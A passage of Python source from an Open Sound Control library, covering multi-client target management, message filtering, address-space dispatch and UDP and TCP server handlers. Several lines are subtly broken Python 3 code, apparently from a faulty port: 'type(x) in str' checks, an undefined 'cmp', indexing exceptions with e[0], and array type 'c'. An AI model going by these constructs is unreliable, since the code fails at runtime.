def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in str:
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in str:
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in list(self.targets.keys()):
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in list(self.targets.items()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in str:
address = self._searchHostAddr(address)
if (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in list(self.targets.keys())):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in list(dict.items()):
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in list(self.targets.items()):
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = list(out.values())
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in list(filters.keys()):
if filters['/*']:
out = msg
else:
out = None
elif False in list(filters.values()):
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in list(filters.keys()):
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = list(out.values())
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in list(self.targets.items()):
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return list(self.callbacks.keys())
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in list(self.callbacks.keys()):
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in list(self.callbacks.keys()):
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in str:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in str:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
